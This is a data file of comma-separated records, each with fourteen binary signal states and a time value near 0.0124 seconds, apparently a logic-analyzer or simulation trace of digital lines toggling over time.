1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2274120e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2274144e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2274172e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2274196e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2274220e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2274244e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2274268e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2274292e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2274320e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2274344e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2274372e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2274396e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2274420e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2274444e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2274468e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2274492e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2274520e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2274544e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2274572e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2274596e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,1.2274620e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,1.2274644e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,1.2274652e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,1,1.2399384e-02 0,0,1,1,0,1,0,0,0,1,0,0,0,1,1.2399612e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,1,1.2399632e-02 0,1,1,1,0,1,0,0,0,1,0,1,0,1,1.2399660e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,1,1.2399684e-02 0,1,1,1,0,1,0,0,0,1,0,0,1,1,1.2400004e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,1,1.2400028e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,1,1.2400036e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,1,1.2400052e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,1,1.2400076e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,1,1.2400100e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,1,1.2400128e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,1,1.2400152e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,1,1.2400180e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,1,1.2400204e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,1,1.2400228e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,1,1.2400252e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,1,1.2400276e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2400280e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2400304e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2400328e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2400352e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2400380e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2400428e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2400452e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,1.2400460e-02 0,1,1,1,0,1,0,0,0,1,0,0,1,0,1.2400476e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,1.2400500e-02 0,1,1,1,0,1,0,0,0,1,0,0,1,0,1.2400556e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,1.2400580e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2400588e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2400604e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2400628e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2400652e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2400676e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2400700e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2400724e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2400748e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2400776e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2400800e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2400828e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2400852e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2400876e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2400900e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2400924e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2400948e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2400976e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2401000e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2401028e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2401052e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2401076e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,1.2401080e-02 0,1,1,1,0,1,0,0,0,1,0,0,1,0,1.2401124e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,1.2401148e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2401156e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2401176e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2401200e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2401228e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2401252e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2401276e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2401300e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2401324e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2401348e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2401376e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2401400e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2401428e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2401452e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2401476e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2401500e-02 0,1,1,1,0,0,0,0,0,1,0,0,0,0,1.2401504e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,1.2401508e-02 0,1,1,1,0,1,0,0,0,1,0,0,1,0,1.2401548e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,1.2401576e-02 0,1,1,1,0,1,0,0,0,0,0,0,0,0,1.2401580e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2401584e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2401600e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2401628e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2401652e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2401676e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2401700e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2401724e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2401748e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2401776e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2401800e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2401828e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2401852e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2401876e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2401900e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2401924e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2401948e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2401976e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2402000e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2402028e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2402076e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2402100e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,1.2402108e-02 0,1,1,1,0,1,0,0,0,1,0,0,1,0,1.2402124e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,1.2402148e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2402156e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2402176e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2402200e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2402228e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2402252e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2402276e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2402300e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2402324e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2402348e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2402376e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2402400e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2402428e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2402452e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2402476e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2402500e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2402524e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2402548e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2402576e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2402600e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2402628e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2402652e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2402676e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2402700e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2402724e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2402748e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2402776e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2402800e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2402828e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2402852e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2402876e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2402900e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2402924e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2402948e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2403000e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,1.2403028e-02 0,1,1,1,0,1,0,0,0,1,0,0,1,0,1.2403052e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,1.2403076e-02 0,1,1,1,0,1,0,0,0,1,0,0,1,0,1.2403124e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,1.2403148e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2403156e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2403176e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2403200e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2403228e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2403252e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2403276e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2403300e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2403324e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2403348e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2403376e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2403400e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2403428e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2403452e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2403476e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2403500e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2403524e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2403548e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2403576e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2403596e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2403624e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2403652e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2403676e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2403700e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,1.2403704e-02 0,1,1,1,0,1,0,0,0,1,0,0,1,0,1.2403748e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,1.2403776e-02 0,1,1,1,0,1,0,0,0,0,0,0,0,0,1.2403780e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2403784e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2403796e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2403828e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2403852e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2403876e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2403900e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2403924e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2403948e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2403972e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2403996e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2404028e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2404052e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2404072e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2404100e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2404124e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2404148e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2404172e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2404196e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2404220e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2404252e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2404272e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2404300e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2404324e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2404348e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2404372e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2404396e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2404420e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2404452e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2404472e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2404500e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2404524e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2404548e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2404572e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2404596e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2404620e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2404652e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2404672e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2404700e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2404724e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2404748e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2404772e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2404796e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2404820e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2404852e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2404872e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2404900e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2404924e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2404948e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2404972e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2404996e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2405020e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2405052e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2405072e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2405100e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2405124e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2405148e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2405172e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2405196e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2405220e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2405252e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2405272e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2405300e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2405324e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2405348e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2405372e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2405396e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2405420e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2405452e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2405472e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2405500e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2405524e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2405548e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2405572e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2405596e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2405620e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2405652e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2405672e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2405700e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2405724e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2405748e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2405772e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2405796e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2405828e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2405852e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2405872e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2405900e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2405924e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2405948e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2405972e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2405996e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2406028e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2406052e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2406076e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2406100e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2406124e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2406148e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2406176e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2406196e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2406228e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2406252e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2406276e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2406300e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2406324e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2406348e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2406376e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2406400e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2406428e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2406452e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2406472e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2406500e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2406524e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2406548e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2406572e-02 0,1,1,1,0,0,0,0,0,1,0,0,0,0,1.2406576e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,1.2406580e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,1,1.2531352e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,1,1.2531572e-02 1,1,1,1,0,1,0,0,0,1,0,1,0,1,1.2531604e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,1,1.2531628e-02 1,1,1,1,0,1,0,0,0,1,0,0,1,1,1.2531944e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,1,1.2531968e-02 1,1,1,1,0,1,0,0,0,0,0,0,0,1,1.2531972e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,1,1.2531976e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,1,1.2531996e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,1,1.2532020e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,1,1.2532044e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,1,1.2532068e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,1,1.2532092e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,1,1.2532116e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,1,1.2532144e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,1,1.2532168e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2532188e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2532196e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2532220e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2532244e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2532268e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2532292e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2532316e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,1.2532324e-02 1,1,1,1,0,1,0,0,0,1,0,0,1,0,1.2532340e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,1.2532368e-02 1,1,1,1,0,1,0,0,0,0,0,0,0,0,1.2532372e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2532376e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2532396e-02 1,1,1,1,0,0,0,0,0,1,0,0,0,0,1.2532420e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,1.2532424e-02 1,1,1,1,0,1,0,0,0,1,0,0,1,0,1.2532468e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,1.2532492e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2532500e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2532516e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2532540e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2532568e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2532592e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2532620e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2532644e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2532668e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2532692e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2532744e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2532768e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2532820e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2532844e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2532892e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2532916e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2532968e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2532996e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2533020e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2533044e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2533068e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2533092e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,1.2533100e-02 1,1,1,1,0,1,0,0,0,1,0,0,1,0,1.2533144e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,1.2533168e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2533176e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2533196e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2533220e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2533268e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2533292e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2533344e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2533368e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2533420e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2533444e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2533468e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2533492e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2533516e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2533540e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2533588e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2533616e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,1.2533620e-02 1,1,1,1,0,1,0,0,0,1,0,0,1,0,1.2533668e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,1.2533692e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2533700e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2533740e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2533768e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2533816e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2533840e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2533868e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2533892e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2533916e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2533940e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2533964e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2533988e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2534016e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2534040e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2534068e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2534092e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2534116e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2534140e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2534192e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2534216e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,1.2534220e-02 1,1,1,1,0,1,0,0,0,1,0,0,1,0,1.2534240e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,1.2534268e-02 1,1,1,1,0,1,0,0,0,0,0,0,0,0,1.2534272e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2534276e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2534292e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2534316e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.2534340e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.2534364e-02 